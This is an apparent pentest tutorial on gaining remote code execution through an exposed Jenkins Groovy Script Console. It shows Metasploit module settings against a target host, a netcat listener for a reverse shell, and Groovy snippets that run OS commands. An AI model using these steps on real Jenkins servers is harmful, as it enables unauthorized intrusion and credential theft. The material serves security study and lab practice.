here were so many possibilities to exploit Jenkins however we were interested in

Script Console because Jenkins has lovely Groovy script console that permits anyone
to run arbitrary Groovy scripts inside the Jenkins master runtime.

Table of Content
Jenkins Groovy Script Console
Exploit Groovy Script Console using Metasploit
revsh.groovy
Groovy executing shell commands -I
Groovy executing shell commands -II
Jenkins Groovy Script Console
Jenkins features a nice Groovy script console which allows one to run arbitrary
Groovy scripts within the Jenkins master runtime or in the runtime on agents. It is
a web-based Groovy shell into the Jenkins runtime. Groovy is a very powerful
language which offers the ability to do practically anything Java can do including:

Create sub-processes and execute arbitrary commands on the Jenkins master and
agents.
It can even read files in which the Jenkins master has access to on the host
(like /etc/passwd)
Decrypt credentials configured within Jenkins.
Granting a normal Jenkins user Script Console Access is essentially the same as
giving them Administrator rights within Jenkins.
Source: https://wiki.jenkins-ci.org/display/JENKINS/Jenkins+Script+Console

Exploit Groovy Script Console using Metasploit

This module uses the Jenkins-CI Groovy script console to execute OS commands using
Java.

use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit
1
2
3
4
5
6
use exploit/multi/http/jenkins_script_console
msf exploit(jenkins_script_console) > set rhost 192.168.1.106
msf exploit(jenkins_script_console) > set rport 8484
msf exploit(jenkins_script_console) > set targeturi /
msf exploit(jenkins_script_console) > set target 0
msf exploit(jenkins_script_console) > exploit
Metasploit uses command stager to exploit against command injection.

Hence, you can observe, that it has given meterpreter session of the victim’s
machine.

revsh.groovy
Suppose if you found Jenkins without login password or you are a normal user who
has permission to access script console then you can exploit this privilege to get
the reverse shell of the machine. At Jenkins Dashboard go to Manage Jenkins and
then select Script Console.

At script console, you have full privilege to run any program code, therefore I try
to execute following piece of code which I had taken from Github to get the reverse
connection on my local machine via netcat listener.

nc -lvp 1234
1
nc -lvp 1234
Once the above script will be executed, it will give netcat session of the victim’s
machine.

Groovy executing shell commands -I

Similarly, with the help of following the piece of code which I found from this
here, I try to create RCE for executing OS command through groovy script console.

def sout = new StringBuffer(), serr = new StringBuffer()

def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
1
2
3
4
5
def sout = new StringBuffer(), serr = new StringBuffer()
def proc = 'ipconfig'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"
Once you will run the script, it will execute the command given inside the code.
you can observe result where we have fetched network configuration due to ipconfig
command.

Groovy executing shell commands -II

Similarly, I found another very small piece of code to exploit the Groovy Console
from here, which will generate RCE and execute the shell command.

def cmd = "cmd.exe /c dir".execute();

println("${cmd.text}");
1
2
def cmd = "cmd.exe /c dir".execute();
println("${cmd.text}");
Again you will run the script, it will execute the command given inside the code.
you can observe result where we have fetched directory list due to dir command.